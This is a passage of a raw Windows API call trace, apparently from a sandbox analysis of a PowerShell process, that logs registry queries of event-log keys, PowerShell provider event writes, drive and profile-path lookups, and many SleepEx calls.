RegCloseKey (hKey=0x688) returned 0x0 [0244.410] RegCloseKey (hKey=0x684) returned 0x0 [0244.411] RegCloseKey (hKey=0x674) returned 0x0 [0244.412] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f594 | out: phkResult=0x6a6f594*=0x674) returned 0x0 [0244.413] RegQueryInfoKeyW (in: hKey=0x674, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x6a6f5e4, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f5e0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x6a6f5e4*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x6a6f5e0*=0x13, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.413] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x0, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.413] CoTaskMemFree (pv=0x0) [0244.413] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x1, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.413] CoTaskMemFree (pv=0x0) [0244.413] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x2, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.413] CoTaskMemFree (pv=0x0) [0244.413] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x3, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.413] CoTaskMemFree (pv=0x0) [0244.413] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x4, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.413] CoTaskMemFree (pv=0x0) [0244.413] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x5, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.413] CoTaskMemFree (pv=0x0) [0244.414] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x6, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.414] CoTaskMemFree (pv=0x0) [0244.414] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x7, lpName=0x4b25c20, lpcchName=0x6a6f600, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x6a6f600, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0244.414] CoTaskMemFree (pv=0x0) [0244.414] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.414] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x0) returned 0x2 [0244.414] RegCloseKey (hKey=0x684) returned 0x0 [0244.414] RegOpenKeyExW (in: hKey=0x674, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.414] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x0) returned 0x2 [0244.414] RegCloseKey (hKey=0x684) returned 0x0 [0244.415] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.415] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x0) returned 0x2 [0244.415] RegCloseKey (hKey=0x684) returned 0x0 [0244.415] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.415] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x0) returned 0x2 [0244.415] RegCloseKey (hKey=0x684) returned 0x0 [0244.415] RegOpenKeyExW (in: hKey=0x674, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.415] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x0) returned 0x2 [0244.415] RegCloseKey (hKey=0x684) returned 0x0 [0244.415] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.416] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x0) returned 0x2 [0244.416] RegCloseKey (hKey=0x684) returned 0x0 [0244.416] RegOpenKeyExW (in: hKey=0x674, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.416] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x0) returned 0x2 [0244.416] RegCloseKey (hKey=0x684) returned 0x0 [0244.416] RegOpenKeyExW (in: hKey=0x674, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x684) returned 0x0 [0244.416] RegOpenKeyExW (in: hKey=0x684, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x6a6f5c0 | out: phkResult=0x6a6f5c0*=0x688) returned 0x0 [0244.416] RegCloseKey (hKey=0x688) returned 0x0 [0244.417] RegCloseKey (hKey=0x674) returned 0x0 [0244.418] RegCloseKey (hKey=0x684) returned 0x0 [0244.419] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x7140004 [0244.422] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4b26934*="Registry", lpRawData=0x4b26848) returned 1 [0244.427] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4b28914*="Alias", lpRawData=0x4b2883c) returned 1 [0244.429] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4b2aa14*="Environment", lpRawData=0x4b2a93c) returned 1 [0244.431] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x6a6f5c4, nSize=0x80 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0244.431] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x10 [0244.431] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy", nBufferLength=0x10, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy", lpFilePart=0x0) returned 0xf [0244.431] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6f67c) returned 1 [0244.431] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy" (normalized: "c:\\users\\fd1hvy"), fInfoLevelId=0x0, lpFileInformation=0x6a6f6f8 | out: lpFileInformation=0x6a6f6f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x3000)) returned 1 [0244.432] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6f678) returned 1 [0244.432] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6a6ee20, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0244.433] GetLogicalDrives () returned 0x4 [0244.434] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0244.434] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0244.434] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.435] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6f668) returned 1 [0244.435] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x6a6f570, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x6a6f690, lpMaximumComponentLength=0x6a6f68c, lpFileSystemFlags=0x6a6f688, lpFileSystemNameBuffer=0x6a6f508, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x6a6f690*=0xb4197730, lpMaximumComponentLength=0x6a6f68c*=0xff, lpFileSystemFlags=0x6a6f688*=0x3e702ff, lpFileSystemNameBuffer="NTFS") returned 1 [0244.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6f664) returned 1 [0244.436] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.436] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.436] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0244.436] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0244.436] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a6f620) returned 1 [0244.436] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x4b2b9e4 | out: lpFileInformation=0x4b2b9e4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x31b3b9e4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x865407b, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0x865407b, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0244.436] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a6f61c) returned 1 [0244.436] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4 [0244.436] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x4, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0244.436] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.436] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.443] PathIsNetworkPathW (pszPath="C:\\") returned 0 [0244.444] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5 [0244.444] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x5, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0244.444] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.445] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0244.449] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x16 [0244.450] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4b2d82c*="FileSystem", lpRawData=0x4b2d754) returned 1 [0244.452] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4b2f9fc*="Function", lpRawData=0x4b2f924) returned 1 [0244.548] ReportEventW (hEventLog=0x7140004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x4a2f280*="Variable", lpRawData=0x4a2f1a8) returned 1 [0244.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.644] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.738] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.832] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.875] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.876] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0244.941] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.067] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.128] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0245.223] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.207] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.253] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.300] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0246.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0247.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6a6e870, nSize=0x80 | out: lpBuffer="") returned 0x0 [0249.359] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.440] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.492] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.663] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.711] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.758] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.805] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.853] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.908] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.917] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.921] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.933] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.964] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0249.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.074] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.164] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.211] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.262] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.352] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.399] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.476] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.486] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.489] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.493] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.494] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.495] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.543] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.544] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.572] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.576] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.585] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.602] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.602] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.604] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.641] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.647] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.648] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.661] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.665] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.682] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.686] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0250.707] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.870] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.895] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.898] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.907] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.926] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.973] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0256.985] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.080] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.091] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.110] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.117] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.119] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.124] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.353] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.377] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.413] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.432] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.433] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.455] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.501] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.502] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.505] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.519] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.583] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.627] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.721] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0257.768] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.148] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.172] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.180] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.181] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.186] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.203] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.254] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.260] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.290] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.328] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.330] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.331] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.332] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.344] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.378] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.510] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.522] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.522] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.523] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.606] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.637] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.639] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.640] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.642] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.649] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.669] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.688] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.735] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.777] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.801] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.802] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.807] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.809] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.840] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.897] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.920] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0275.946] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0276.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0276.029] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 